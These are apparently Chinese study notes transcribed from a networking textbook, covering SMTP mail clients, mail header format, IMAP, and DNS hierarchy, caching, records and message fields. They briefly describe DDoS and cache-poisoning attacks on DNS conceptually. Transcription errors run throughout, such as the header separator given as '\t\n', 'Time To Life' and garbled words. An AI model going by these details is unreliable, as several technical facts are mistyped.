强烈推荐你做本章后面的编程作业3。在该作业中,你将在SMTP的客户端实现一个简单的用户代理,它允许你经本地邮件服务器向任意的接收方发送电子邮件报文。

作业3:邮件客户
这个编程作业的目的是创建一个向任何接收方发送电子邮件的简单邮件客户。你的客户将必须与邮件服务器(如谷歌的电子邮件服务)创建一个TCP连接,使用SMTP协议与邮件服务器进行交谈,经该邮件服务器向某接收方(如你的朋友)发送一个电子邮件报文,最后关闭与该邮件服务器的TCP连接。
对本作业,配套Web站点为你的客户提供了框架代码。你的任务是完善该代码并通过向不同的用户账户发送电子邮件来测试你的客户。你也可以尝试通过不同的服务器(例如谷歌的邮件服务器和你所在大学的邮件服务器)进行发送。

#邮件报文格式

当Alice给Bob写一封邮寄时间很长的普通信件时,她可能要在信的上部包含各种各样的环境首部信息,如Bob的地址、她自己的回复地址以及日期等。类似地,当一个人给另一个人发送电子邮件,一个包含环境信息的首部位于报文体前面。这些环境信息包括在一系列首部行,这些行由RFC 5322定义。首部行和该报文的体用空(即\t\n)进行分隔。RFC 5322定义了邮件首部行和它们的语义解释的精确格式。如同HTTP一样,每个首部行包含了可读的文本,是由关键词后跟冒号及其值组成的。某些关键词是必需的,另一些则是可选的。每个首部必须含有一个From:首部行和一个To:首部行,一个首部也许包含一个Subjeet:首部行以及其他可选的首部行。注意:这些首部行不同于我们在2.3.1节所学到的SMTP命令(即使那里包含了某些相同的词汇，如from和to)。那节中的命令是SMTP握手协议的一部分。本节中考察的首部行则是邮件报文自身的一部分。

一个典型的报文首部如下：

From: alice@crepes.frTD: bob@hamburger.eduSubject: Searching for the meaning of 1ife

在报文首部之后，紧接一个空白行，然后是ASCII格式表示的报文体。你应当用telnet向邮件服务器发送包含一些首行部的报文，包括Subject:首部行。

#邮件访问协议

一旦SMTP将邮件报文从Alice的邮件服务器交付给Bob的邮件服务器,该报文就被放入了Bob的邮箱中。假设Bob(接收方)在其本地主机(如智能手机或PC)上运行用户代理程序,考虑在他的本地PC上也放置一个邮件服务器是自然而然的事,在这种情况下，Alice的邮件服务器就能直接与Bob的PC进行对话了。然而这种方法会有一个问题：前面讲过邮件服务器管理用户的邮箱,并且和运行SMTP的客户端和服务器端。如果Bob的邮件服务器位于他的PC上,那么为了能够及时接收可能在任何时候到达的新邮件,他的PC必须总是不间断地运行着并一直保持在线。这对于许多因特网用户而言是不现实的。相反,典型的用户通常在本地PC上运行一个用户代理程序,它访问存储在总是保持开机的共享邮件服务顺上的邮箱。该邮件服务顺与其他用户共享。

现在我们考虑当从Alice向Bob发送一个电子邮件报文时所采取的路径。我们刚才已经知道,在沿着该路径的某些点上,需要将电子邮件报文存放在Bob的邮件服务器上。通过让Alice的用户代理直接向Bob的邮件服务器发送报文,就能够做到这一点。然而,通常Alice的用户代理和Bob的邮件服务器之间并没有一个直接的SMTP对话。相反,如图2-16所示,Alice的用户代理用SMTP或HTTP将电子邮件报文推入她的邮件服务器,接着她的邮件服务器(作为一个SMTP客户)再用SMTP将该邮件中继到Bob的邮件服务需。为什么该过程要分成两步?主要是因为不通过Alice的邮件服务器进行中继,Alice的用户代理将没有任何办法到达一个不可达的目的地邮件服务器。通过首先将邮件存放在自己的邮件服务器中,Alice的邮件服务器可以重复地尝试向Bob的邮件服务顺发送该报文,如每30分钟一次直到Bob的邮件服务器变得运行为止。(并且如果Alice的邮件服务器关机,则她能向系统管理员进行申告)

但是对于该难题仍然有一个疏漏的环节,像Bob这样的接收方,是如何通过运行其本地PC上的用户代理,获得位于他的某ISP的邮件服务器上的邮件呢?值得注意的是Bob的用户代理不能使用SMTP得到报文，因为SMTP是一个推协议，取得报文是一个拉操作。

今天,Bob从邮件服务器取回邮件有两种常用方法。如果Bob使用基于Web的电子邮件或智能手机上的客户端(如Gmail),则用户代理将使用HTTP来取回Bob的电子邮件。这种情况要求Bob的电子邮件服务器具有HTTP接口和SMTP接口(与Alice的邮件服务器通信)。另一种方法是使用由RFC 3501定义的因特网邮件访问协议(Internet Mail Access Protocol,IMAP),这通常用于微软的Outlook等。HTTP和TMAP方法都支持Bob管理自己邮件服务器中的文件夹,包括将邮件移动到他创建的文件夹中,删除邮件,将邮件标记为重要邮件等。

#DNS：因特网的目录服务

因特网上的主机和人类一样,可以使用多种方式进行标识。主机的一种标识方法是用主机名(hostname),如www.facebook.com、www.google.com、gaia.cs.umass.edu等,这些名字便于记忆也乐于被人们接受。然而,主机名几乎没有提供(即使有也很少)关于主机在因特网中位置的信息。(一个名为www.eurecom.fr的主机以国家码.fr结束,告诉我们该主机很可能在法国,仅此而已。)况且,主机名可能由不定长的字母数字组成,路由器难以处理。为此,主机也可以使用所谓的IP地址(IP address)进行标识。

我们将在第4章更为详细地讨论下地址,但现在简略地介绍一下还是有必要的。一个IP地址(这里仅指IPv4)由4个字节组成,并有着严格的层次结构。例如121.7.106.83这样一个IP地址,其中的每个字节都被句点分隔开来,表示了0~255的十进制数字。我们说IP地址具有层次结构,是因为当我们从左至右扫描它时,会得到越来越具体的关于主机位于因特网何处的信息(即在众多网络的哪个网络里)。类似地,当我们从下向上查看邮政地址时,能够获得该地址位于何处的越来越具体的信息。

#DNS提供的服务

我们刚刚看到了识别主机有两种方式一一主机名和IP地址。人们喜欢便于记忆的主机名标识方式,而路由器则喜欢定长的、有着层次结构的IP地址。为了对这些不同的偏好进行折中,我们需要一种能进行主机名到IP地址转换的目录服务。这就是域名系统(Domain Name System,DNS)的主要任务。DNS是:

一个由分层的DNS服务器(DNS server)实现的分布式数据库。
一个使得主机能够查询分布式数据库的应用层协议。

DNS服务器通常是运行了BIND(Berkeley Internet Name Domain)软件[BIND 2020]的UNIX机器。DNS协议运行在UDP之上,使用53号端口。

什么是BIND？
BIND是一款实现DNS服务器的开放源码软件,够提供双向解析，转发，子域授权，view等功能,是世界上使用最为广泛的DNS服务器软件，目前Internet上半数以上的DNS服务器有都是用Bind来架设的。

DNS:通过客户-服务器模式提供的重要网络功能
与HTTP，FTP和SMP一样，DNS、协议是应用层协议，其原因在于：
使用客户-服务器模式运行在通信的端系统之间
在通信的端系统之间通过下面(指下层)的端到端协议来传送DNS报文。
然而，在其他意义上，DNS的作用非常不同于Web应用、文件传输应用以及电子邮件应用。与这些应用程序的不同之处在于，DNS不是一个直接和用户打交道的应用，而是为因特网上的用户应用程序以及其他软件提供一种核心功能，即将主机名转换为其背后的IP地址。我们在1.2节就提到，因特网体系结构的复杂性大多数位于网络的“边缘”。DNS通过采用位于网络边缘的客户和服务器，实现了关键的名字到数字的转化功能，他还是这种设计模式的另一个范例。

DNS通常是由其他应用层协议所使用的,包括HTTP和SMTP,将用户提供的主机名解析为下地址。举一个例子,考虑运行在某用户主机上的一个浏览器(即一个HTTP客户)请求URLwww.someschool.edu/index.html页面时会发生什么现象。为了使用户的主机能够将一个HTTP请求报文发送到Web服务器www.someschool.edu,该用户主机必须获得www.someschool.edu的IP地址。其做法如下:

同一台用户主机上运行着DNS应用的客户端
浏览器从上述URL中抽取出主机名www.someschool.edu,并将主机名传给DNS应用的客户端。
DNS客户向DNS服务器发送一个包含主机名的请求。
DNS客户最终会收到一份回答报文,其中含有对应于该主机名的IP地址。
一旦浏览器接收到来自DNS的该IP地址,它就向位于该了IP地址80端口的HTTP服务器进程发起一个TCP连接。

从这个例子中,我们可以看到DNS给使用它的因特网应用带来了额外的时延,有时还相当可观。幸运的是,如我们下面讨论的那样,想获得的卫IP址通常就缓存在一个“附近的”DNS服务器,这有助于减少DNS的网络流量和DNS的平均时延。

除了进行主机名到IP地址的转换外，DNS还提供了一些重要的服务：

主机别名(host aliasing)。有着复杂主机名的主机能拥有一个或者多个别名。例如,一台名为relay1.west-coast.enterprise.com的主机,可能还有两个别名enterprise.com和www.enterprise.com。在这种情况下,relay1.west-coast,enterprise.com也称为规范主机名(canonical hostname)。主机别名(当存在时)比主机规范名更加容易记忆。应用程序可以调用DNS来获得主机别名对应的规范主机名以及主机的IP地址。
邮件服务器别名(mail server aliasing)。显而易见,人们也非常希望电子邮件地址好记忆。例如,如果Bob在雅虎邮件上有一个账户,Bob的邮件地址就像bob@yahoo.com这样简单。然而,雅虎邮件服务器的主机名可能更为复杂,不像yahoo.com那样简单好记(例如,规范主机名可能像relay1.west-coast.hotmail.com那样)。电子邮件应用程序可以调用DNS,对提供的主机别名进行解析,以获得该主机的规范主机名及其IP地址。。事实上,MX记录(参见后面)允许一个公司的邮件服务器和Web服务器使用相同(别名)的主机名,例如,一个公司的Web服务器和邮件服务器都能叫作enterprise.com。
负载分配(load distribution)。DNS也用于在冗余的服务器(如冗余的Web服务器等)之间进行负载分配。繁忙的站点(如cnn.com)被冗余分布在多台服务器上(相同服务但是服务器不同),每台服务器均运行在不同的端系统上,每个都有着不同的IP地址。由于这些冗余的Web服务器,一个IP地址集合与同一个规范主机名相联系。DNS数据库中存储着这些IP地址集合。当客户对映射到某地址集合的名字发出一个DNS请求时,该服务器用IP地址的整个集合进行响应,但在每个回答中循环这些地址次序。因为客户通常总是向IP地址排在最前面的服务器发送HTTP请求报文,所以DNS就在所有这些冗余的Web服务器之间循环分配了负载。DNS的循环同样可以用于邮件服务器,因此多个邮件服务器可以具有相同的别名。一些内容分发公司也以更复杂的方式使用DNS，以提供Web内容分发(参见2.6.3节)。

DNS由RFC 1034和RFC 1035定义,并且在几个附加的RFC中进行了更新。DNS是一个复杂的系统,我们在这里只是就其运行的主要方面进行学习。感兴趣的读者可以参考这些RFC文档以及Albitz和Liu的书[Albitz 1993|,亦可参阅文章[Mockapetris 1998]和[Mockapetris 2005],其中[Mockapetris 1998]是回顾性的文章,它对DNS组成和工作原理进行了细致的讲解。

#DNS工作机理概述

下面给出一个DNS工作过程的总体概述,我们的讨论将集中在主机名到IP地址转换服务方面。

假设运行在用户主机上的某些应用程序(如Web浏览器或邮件阅读器)需要将主机名转换为IP地址。这些应用程序将调用DNS的客户端,并指明需要被转换的主机名(在很多基于UNIX的机器上,应用程序为了执行这种转换需要调用函数gethostbyname())。用户主机上的DNS接到后,向网络中发送一个DNS查询报文。所有的DNS请求和回答报文使用UDP数据报经端口53发送。经过若干毫秒到若干秒的时延后,用户主机上的DNS接收到一个提供所希望映射的DNS回答报文。这个映射结果则被传递到调用DNS的应用程序。因此,从用户主机上调用应用程序的角度看,DNS是一个提供简单、直接的转换服务的黑盒子。但事实上,实现这个服务的黑盒子非常复杂,它由分布于全球的大量DNS服务器以及定义了DNS服务器与查询主机通信方式的应用层协议组成。

DNS的一种简单设计是在因特网上只使用一个DNS服务器,该服务器包含所有的映射。在这种集中式设计中,客户直接将所有查询直接发往单一的DNS服务器,同时该DNS服务器直接对所有的查询客户做出响应。尽管这种设计的简单性非常具有吸引力,但它不适用于当今的因特网,因为因特网有着数量巨大(并持续增长)的主机。这种集中式设计的问题包括：

单点故障〈single point of failure):如果该DNS服务器崩溃,整个因特网随之瘫痪。
通信容量(traffic volume): 。单个DNS服务器不得不处理所有的DNS查询(用于为上亿台主机产生的所有HTTP请求报文和电子邮件报文服务)。
远距离的集中式数据库(distant centralized database):单个DNS服务器不可能“邻近”所有查询客户。如果我们将单台DNS服务器放在纽约市,那么所有来自澳大利亚的查询必须传播到地球的另一边,中间也许还要经过低速和拥塞的链路。这将导致严重的时延。
维护(maintenance):单个DNS服务器将不得不为所有的因特网主机保留记录。这不仅将使这个中央数据库无比庞大,而且它还不得不为解决每个新添加的主机而频繁更新。

总的来说,在单一DNS服务器上运行集中式数据库完全没有可扩展能力。因此,DNS采用了分布式的设计方案。事实上,DNS是一个在因特网上实现分布式数据库的精彩范例。

1.分布式，层次数据库

为了处理扩展性问题,DNS使用了大量的DNS服务器,它们以层次方式组织并且分布在全世界范围内。没有一台DNS服务器拥有因特网上所有主机的映射,这些映射分布在所有的DNS服务器上。大致说来,有3种类型的DNS服务器:根DNS服务器、顶级域(Top-Level Domain,TLD)DNS服务器和权威DNS服务器。这些服务器以图2-17中所示的层次结构组织起来。为了理解这3种类型的DNS服务器交互的方式,假定一个DNS客户要确定主机名www.amazon.com的IP地址。粗略说来,将发生下列事件。

客户首先与根服务器之一联系,它将返回顶级域名com的TLD服务器的IP地址。
该客户与这些TLD服务器之一联系,它将为amazon.com返回权威服务器的IP地址。
最后,该客户与amazon.com权威服务器之一联系,它为主机名www.amazon.com返回IP地址。我们将很快更为详细地考察DNS查找过程。不过我们先仔细看一下这3种类型的DNS服务器。

根DNS服务器:有超过1000台根DNS服务器实体遍及全世界。这些根服务器是13个不同根服务器的副本,由12个不同组织管理,并通过因特网号码分配机构来协调[IANA 2020]。根名字服务器的全部清单连同管理它们的组织及其下地址可以在[Root Servers 2020]中找到。根服务器提供TLD服务的IP地址。
顶级域(TLD)DNS服务:对于每个顶级域(如com、org、net、edu和gov)和所有国家的顶级域(如uk、fr、cn和jp等),都有TLD服务器(或服务器集群)。Verisign Global Registry Services公司维护com顶级域的TLD服务器,Educause公司维护edu项级域的TLD服务器。支持TLD的网络基础设施可能是大而复杂的,[Osterweil 2012]对Verisign网络进行了很好的概述。所有项级域的列表参见[TLD list 2020]。TLD服务器提供了权威DNS服务器的IP地址。
权威DNS服务器：在因特网上具有公共可访问主机(如Web服务器和邮件服务器)的每个组织机构必须提供公共可访问的DNS记录,这些记录将这些主机的名字上映射为IP地址。一个组织机构的权威DNS服务器收藏了这些DNS记录。一种方法是,一个组织机构可以选择实现自己的权威DNS服务器以保存这些记录;另一种方法是,该组织能够支付费用,让这些记录存储在某个服务提供商的一个权威DNS服务器中。多数大学和大公司实现并维护它们自己的基本和辅助(备份)的权威DNS服务器。

根、TLD和权威DNS服务器都处在该DNS服务器的层次结构中,如图2-17所示。还有另一类重要的DNS服务器,称为本地DNS服务器(local DNS server)。严格说来,一个本地DNS服务器并不属于该服务器的层次结构,但它对DNS层次结构是至关重要的。每个ISP(如一个居民区的ISP或一个机构的ISP)都有一台本地DNS服务器(也叫默认名字服务器)。当主机与某个ISP连接时,该ISP提供一台主机的卫地址,该主机具有一台或多台其本地DNS服务器的IP地址(通常通过DHCP,将在第4章中讨论)。通过访问Windows或UNIX的网络状态窗口,用户能够容易地确定自己的本地DNS服务器的IP地址.主机的本地DNS服务器通常“邻近”本主机。对某机构ISP而言,本地DNS服务器可能就与主机在同一个局域网中;对于某居民区ISP来说,本地DNS服务器通常与主机相隔不超过几台路由器。当主机发出DNS请求时,该请求被发往本地DNS服务器,它起着代理的作用,并将该请求转发到DNS服务器层次结构中,下面我们将更为详细地讨论。

我们来看一个简单的例子,假设主机cse.nyu.edu想知道主机gaia.cs.umass.edu的IP地址。同时假设纽约大学(NYU)的cse.nyu.edu主机的本地DNS服务器为dns.nyu.edu,并且gaia.cs.umass.edu的权威DNS服务器为dns.umass.edu。如图2-18所示,主机cse.nyu.edu首先向它的本地DNS服务器dns.nyu.edu发送一个DNS查询报文。该查询报文含有被转换的主机名gaia.cs.umass.edu。本地DNS服务器将该报文转发到根DNS服务骼。该根DNS服务器注意到其edu后缀并向本地DNS服务器返回负责edu的TLD服务器的IP地址列表.该本地DNS服务器则再次向这些TLD服务器之一发送查询报文.该TLD服务器注意到umass.edu后缀,并用权威DNS服务器的IP地址进行响应,该权威DNS服务器是负责马萨诸塞大学的dns.umass.edu.最后,本地DNS服务器直接向dns.umass.edu重发查询报文,dns.umass.edu用gaia.cs.umass.edu的IP地址进行响应。注意到在本例中,为了获得一台主机名的映射,共发送了8份DNS报文:4份查询报文和4份回答报文!我们将很快看到利用DNS缓存减少这种查询流量的方法。

前面的例子假设了TLD服务器知道用于主机的权威DNS服务器的IP地址。一般而言,这种假设并不总是正确。相反,TLD服务器只是知道中间的某个DNS服务器，该中间DNS服务器才可能能知道用于该主机的权威DNS服务器，若不知道,则接着查询下一个中间服务器。例如,再次假设马萨诸塞大学有一台用于本大学的DNS服务器,称为dns.umass.edu。同时假设该大学的每个系都有自己的DNS服务器,每个系的DNS服务器是本系所有主机的权威服务器。在这种情况下,当中间DNS服务器dns.umass.edu收到了对某主机的请求时,该主机名是以cs.umass.edu结尾,它向dns.nyu.edu(前面提到的请求者的本地DNS服务器)返回dns.cs.umass.edu的IP地址,后者是所有以cs.umass.edu结尾的主机的权威服务器。本地DNS服务dns.nyu.edu则向权威DNS服务器发送查询,该权威DNS服务器向本地DNS服务器返回所希望的映射,该本地服务次向请求主机返回该映射。在这个例子中,共发送了10份DNS报文。相当于在访问权威DNS服务器时可能存在中间DNS服务器的情况。

图2-18所示的例子利用了递归查询(recursive query)和迭代查询（iterative query)。从cse.nyu.edu到dns.nyu.edu发出的查询是递归查询,因为该查询以自己的名义请求dns.nyu.edu来获得该映射。而后继的3个查询是迭代查询,因为所有的回答都是直接返回给dns.nyu.edu。从理论上讲,任何DNS查询既可以是迭代的也可以是递归的。例如,图2-19显示了一条DNS查询链,其中的所有查询都是递归的。实践中,查询通常遵循图2-18中的模式:从请求主机到本地DNS服务器的查询是递归的,其余的查询是迭代的。

2.DNS缓存

至此我们的讨论一直忽略了DNS系统的一个非常重要的特色：DNS缓存(DNS caching)。实际上，为了改善时延性能并减少在因特网上到处传输DNS报文数量，DNS广泛使用了缓存技术。DNS缓存的原理非常简单。在一个请求链中,当某DNS服务器接收一个DNS回答(例如,包含某主机名到IP地址的映射)时,它就能将映射缓存在本地存储器中。例如,在图2-18中,每当DNS服务器dns.nyu.edu从某个DNS服务器接收到一个回答,他就能够缓存包含在该回答中的任何信息.如果在DNS服务器中缓存了一个主机名/IP地址对,另一个对相同主机名的查询到达该DNS服务器时,该DNS服务器就能够提供所要求的IP地址,即使它不是该主机名的权威服务器。由于主机和主机名与耻地址间的映射并不是永久的,DNS服务器在一段间后将丢弃缓存的信息。

#DNS记录和报文

共同实现DNS分布式数据库的所有DNS服务器存储了资源记录(Resource Record,RR),RR提供了主机名到IP地址的映射(或者主机名到另一主机名的映射，后述)。每个DNS回答报文包含了一条或多条资源记录。在本小节以及后续小节中,我们概要地介绍DNS资源记录和报文,更详细的信息可以在[Albitz 1993]或有关DNS的REFC文档[RFC 1034,RFC 1035]中找到。

资源记录是一个包含了下列字段的4元组：

(Name, Value, Type, TTL)

TTL(Time To Life)是该记录的生存时间，它决定了资源记录应当从缓存中删除的时间。在下面给出的记录例子,我们忽略掉TTL字段。Name和Value的意义取决于Type:

如果Type=A,则对该主机名而言Name是主机名,Value是该主机名对应的IP地址。因此,一条类型为A的资源记录提供了标准的主机名到IP地址的映射。例如(relay1.bar.foo.com, 145.37.93.126, A)就是一条类型A的记录。
如果Type=NS,则对该域中的主机而言Name是域(如foo.com),而Value是一个知道如何获得该域中主机IP地址的权威DNS服务器的主机名。这个记录用于委托域名解析权，即将该域名移交给其他DNS服务器解析。例如(foo.com,dns.foo.com,NS)就是一条类型为NS的记录。
如果Type=CNAME,则Value是主机别名Name对应的规范主机名。该记录能够向查询的主机提供一个主机名对应的规范主机名,例如(foo.com,relay1.bar.foo.com,CNAME)就是一条CNAME类型的记录。
实际上是把一个域名指向另一个域名。
如果Type=MX,则Value是一个别名为Name的邮件服务器的规范主机名。举例来说,(foo.com,mail.bar.foo.com,MX)就是一条MX记录。MX记录人允许邮件服务器主机名有具有简单的别名。值得注意的是,通过使用MX记录,一个公司的邮件服务器和其他服务器(如它的Web服务器)可以使用相同的别名。为了获得邮件服务器的规范主机名,DNS客户应当请求一条MX记录;而为了获得其他服务器的规范主机名,DNS客户应当请求CNAME记录.
也就是说,在以邮件服务为目的检索foo.com时,会请求MX记录,再根据其邮件服务器的规范主机名来查询其IP;以其他服务为目的检索foo.com时,则会请求CNAME记录,得到规范主机名,再查询其IP地址.

如果一台DNS服务器是某特定主机名的权威DNS服务器,那么该DNS服务器会有一条包含用于该主机名的类型A记录(即使该DNS服务器不是其权威DNS服务器,它也可能在缓存中包含几条类型A记录)。如果服务器不是用于某主机名的权威服务器,那么该服务器将包含一条类型NS记录,该记录对应于包含主机名的域;它还将包含一条类型A记录,该记录提供了在NS记录的Value字段中的DNS服务器的IP地址.

举例来说,假设一台edu TLD服务器不是主机gaia.cd.umass.edu的权威DNS服务器,则该服务器将包含一条主机gaia.cs.umass.edu的域记录,如(umass.edu,dns.umass.edu,NS);该edu TLD服务器还将包含一条类型A记录,如(dns.umass.edu,128.119.40.111,A),该记录将名字dns.umass.edu映射为一个IP地址。

1.DNS报文

在本节前面,我们提到了DNS查询和回答报文。DNS只有这两种报文,并且查询和回答报文有着相同的格式,如图2-20所示。

DNS报文中的各个字段语义如下：

前12字节是首部区域,其中有几个字段。
- 第一个字段(标识符/id)是一个16bit的数,用于标识该查询。这个标识符会被复制到对查询的回答报文中,以便让客户用它来匹配发送的请求和接收到的回答。标志字段中含有若干标志。
- 标志位有以下几种：
  - “查询/回答(Response,QR)”标志位指出报文是查询报文(0)还是回答报文(1)。
  - 操作码(Opcode)中，0表示标准查询,1表示反向查询,2表示服务器状态请求。
  - 当某DNS服务器是所请求名字的权威DNS服务器时,1bit的“权威的(Authoritative,AA)”标志位被置于回答报文中,以标志该响应服务器就是查询主机名的权威服务器。
  - TC(Truncated)表示是否被截断。值为1时，表示响应已超过512字节并已被截断，只返回前512个字节。
  - 如果客户(主机或者DNS服务器)在该DNS服务器没有某记录时,它将执行递归查询,并设置1bit的“希望递归(Recursion Desired,RD)”标志位。
  - 如果该DNS服务器支持递归查询,在它的回答报文中会设置1bit的“递归器查可用(Recursion Available,RA)”标志位。
  - Z是保留字段，在所有的请求和应答报文中，它的值必须为0。
  - rcode(Reply code)是返回码字段，表示响应的差错状态。当值为0时，表示没有错误；当值为1时，表示报文格式错误，服务器不能理解请求的报文；当值为2时，表示域名服务器失败，因为服务器的原因导致没办法处理这个请求；当值为3时，表示名字错误，只有对授权域名解析服务器有意义，指出解析的域名不存在；当值为4时，表示查询类型不支持，即域名服务器不支持查询类型；当值为5时，表示拒绝，一般是服务器由于设置的策略拒绝给出应答，如服务器不希望对某些请求者给出应答。
在该首部中还有4个有关数量的字段.这些字段指出了在首部后的4类数据区域出现的数量。
问题区域:包含了正在进行的查询信息。该区域包括:
- 名字字段,包含正在被查询的主机名字;
- 类型字段,指出有关该名字的正被询问的问题类型
例如主机地址是与个名字相关联(类型A)还是与某个名字的邮件服务器相关联(类型MX)。
回答区域：包含了对最初请求的Name的资源记录。前面讲过每个资源记录中有Type(如A、NS、CNAME和MX)字段、Value字段和TTL字段。在回答报文的回答区域中可以包含多条RR,因此一个主机名能够有多个IP地址(例如,就像本节前面讨论的冗余Web服务器)。
权威区域：包含了其他权威服务器的信息(注意是其他权威服务器的信息不是该权威服务器的其他信息)。
附加信息区域:包含了其他有帮助的记录。例如,对于一个MX请求的回答报文的回答区域包含了一条资源记录,该记录提供了邮件服务器的规范主机名。该附加信息包含一个类型A记录,该记录提供了用于该邮件服务器的规范主机名的IP地址。

DNS报文的详细解释，实例等可以查看DNS报文格式解析（非常详细）

使用nslookup(nslookup program)可以从正在工作的主机直接向某些DNS服务器发送一个DNS查询。对于多数Windows和UNIX平台,nslookup程序是可用的。例如,从一台Windows主机打开命令提示符界面,直接键人nslookup即可调用nslookup程序。在调用nslookup后,你能够向任何DNS服务器(根、TLD或权威)发送DNS查询。在接收到来自DNS服务器的回答后,nslookup将显示包括在该回答中的记录(以人可读的格式)。从你自己的主机运行nslookup还有一种方法,即访问允许你远程应用nslookup的许多Web站点之一(在一个搜索引擎中键入nslookup就能够得到这些站点中的一个)。本章最后的DNS Wireshark实验将使你更为详细地研究DNS.

2.在DNS数据库中插入记录

上面的讨论只是关注如何从DNS数据库中取数据。你可能想知道这些数据最初是怎么进入数据库中的。我们在一个特定的例子中看看这是如何完成的。假定你刚刚创建了一个称为网络乌托邦(Network Utopia)的令人兴奋的创业公司。你必定要做的第一件事是在注册登记机构注册域名networkutopia.com。注册登记机构(registrar)是一个商业实体,它验证该域名的唯一性,将该域名输入DNS数据库(如下面所讨论的那样),对提供的服务收取少量费用。1999年前,唯一的注册登记机构是Nework Solutions,它独家经营对于com、net和org域名的和注册。但是现在有许多注册登记机构竞争客户,因特网名字和地址分配机构(Internet Corporation for Assigned Names and Numbers,ICANN)向各种注册登记机构授权。在http://www.internic.net上可以找到授权的注册登记机构的完整列表。

当你向某些注册登记机构注册域名networkutopia.com时，需要向该机构提供你的基本、辅助权威DNS服务器的名字和IP地址。假定该名字和IP地址是dns1.networkutopia.com和dns2.networkutopia.com及212.212.212.1和212.212.212.2。对这两个权威DNS服务器的每一个,该注册登记机构确保将一个类型NS和一个类型A的记录输入TLD com服务器。特别是对于用于networkutopia.com的基本权威服务器,该注册登记机构将下列两条资源记录插和人DNS系统中：

(networkutopia.com, dns1.networkutopia.com, NS)(dns1.networkutoepia.com, 212.212.212.1, A)

你还必须确保用于Web服务器www.networkutopia.com的类型A资源记录和用于邮件服务器mail.networkutopia.com的类型MX资源记录被输入你的权威DNS服务器中。[最近,DNS协议中添加了一个更新(UPDATE)选项,允许通过DNS报文对数据库中的内容进行动态添加或者删除。[RFC 2136]和[RFC 3007]定义了DNS动态更新。]

一旦完成所有这些步骤,人们将能够访问你的Web站点,并向你公司的雇员发送电子邮件。我们通过验证该说法的正确性来总结DNS的讨论。这种验证也有助于充实我们已经学到的DNS知识。假定在澳大利亚的Alice要观看www.networkutopia.com的Web页面。如前面所讨论,她的主机将首先向其本地DNS服务器发送请求。该本地服务器接着联系一个TLD com服务器。(如果TLD com服务器的地址没有被缓存,该本地DNS服务器也将必须与根DNS服务器相联系。)该TLD服务器包含前面列出的类型NS和类型A资源记录,因为注册登记机构将这些资源记录搬入所有的TLD com服务器。该TLD com服务器向Alice的本地DNS服务器发送一个回答,该回答包含了这两条资源记录。本地DNS服务需则加212.212.212.1发送一个DNS查询,请求对应于www.networkutopia.com的类型A记录。该记录提供了所和希望的Web服务器的IP地址,如212.212.71.4,本地DNS服务器将该地址回传给Alice的主机。Alice的浏览器此时能够向主机212.212.71.4发起一个TCP连接,并在该连接上发送一个HTTP请求。

DNS脆弱性
我们已经看到DNS是因特网基础设施的一个至关重要的组件,对于包括Web、电子邮件等的许多重要的服务,没有它都不能正常工作。因此,我们自然要问:DNS会受到攻击吗?DNS是一个易受攻击的目标吗?它是将会被淘汰的服务吗?大多数因特网应用会随之一起无法工作吗?
第一种针对DNS服务的攻击是分布式拒绝服务(DDoS)带宽洪泛攻击。倒如,某攻击者可能试图向每个DNS根服务器发送大量的分组,使得大多数合法DNS请求得不到回答。这种对DNS根服务器的DDoS大规模攻击实际发生在2002年10月21日。在这次攻击中,攻击者利用用一个僵尸网络向13个DNS根服务器中的每个都发送了大批的ICMP ping报文负载。(5.6节中讨论ICMP报文。此时,知道ICMP分组是特殊类型的IP数据报就可以了.)幸运的是,这种大规模攻击所带来的损害很小,对用户的因特网体验几乎没有或根本没有影响。攻击者的确成功地将大量的分组指向了根服务器,但许多DNS根服务器受到了分组过滤器的保护,配置的分组过滤器阻挡了所有指向根服务器的ICMP ping报文.这些被保护的服务器因此未受伤并且与平常一样发挥着作用。此外,大多数本地DNS服务器缓存了顶级域名服务器的IP地址,使得这些请求过程通常为DNS根服务器分流.
对DNS的更为有效的潜在DDoS攻击将是向顶级域名服务器(例如向所有处理.com域的顶级域名服务器)发送大量的DNS请求。过滤指向DNS服务器的DNS请求将更为困难,并且顶级域名服务器不像根服务器那样容易绕过。这种对顶级域名服务提供商的攻击发生在2016年10月21日。该DDoS攻击是通过发送大量的DNS查找请求进行的,这些请求来自一个由十万多个物联网设备组成的僵尸网络,这些设备包括被Miral恶意软件感染的打印机、网络相机、住宅网关和婴儿监视器等。攻击几乎持续了一整天,亚马逊、推特、Netflix、GitHub和Spotify都受到了干扰。
DNS也可能潜在地以其他方式被攻击。在中间人攻击中,攻击者截获来自主机的请求并返回伪造的回答。在DNS投毒攻击中,攻击者向一台DNS服务器发送伪造的回答,诱使服务器在它的缓存中接收伪造的记录。这些攻击中的任意一种都可能被用于不良用途,例如将没有疑心的Web用户重定向到攻击者的Web站点。DNS安全扩展套件(已经设计并部署了DNSSEC[Gieben 2004;RFC 4033])用于防范这些漏洞。作为DNS的安全版本,DNSSEC处理了许多类似这样的攻击并在因特网上得到了普及。

#P2P文件分发

到目前为止本章中描述的应用(包括Web、电子邮件和DNS)都采用了客户-服务器体系结构,极大地依赖于总是打开的基础设施服务器。在2.1.1节讲过,使用P2P体系结构,对总是打开的基础设施服务器依赖最少(或者没有依赖)。与之相反,成对间歇连接的主机(称为对等方)彼此直接通信。这些对等方并不为服务提供商所拥有,而是受用户控制的计算机。

在本节中我们将研究一个非常自然的P2P应用,即从单一服务器向大量主机(称为对等方)分发一个大文件。该文件也许是一个新版的Linux操作系统,也许是对于现有操作系统或应用程序的一个软件补丁,或一个MPEG视频文件。在客户-服务器文件分发中,该服务器必须向每个对等方发送该文件的一个副本,即服务器承受了极大的负担,并且消耗了大量的服务器带宽。在P2P文件分发中,每个对等方能够向任何其他对等方重新分发它已经收到的该文件的任何部分,从而在分发过程中协助该服务器。到2020年止,最为流行的P2P文件分发协议是BitTorrent。该应用程序最初由Bram Cohen研发,现不在有许多不同的独立且符合BitTorrent协议的BitTorrent客户,就在有许多像有许多符合HTTP协议的Web浏览器客户一样。在下面的小节中,我们首先考察在文件分发环境中P2P体系结构的自扩展性。然后我们更为详细地描述BitTorrent,突出它的最为重要的特性。

1.P2P体系结构的扩展性

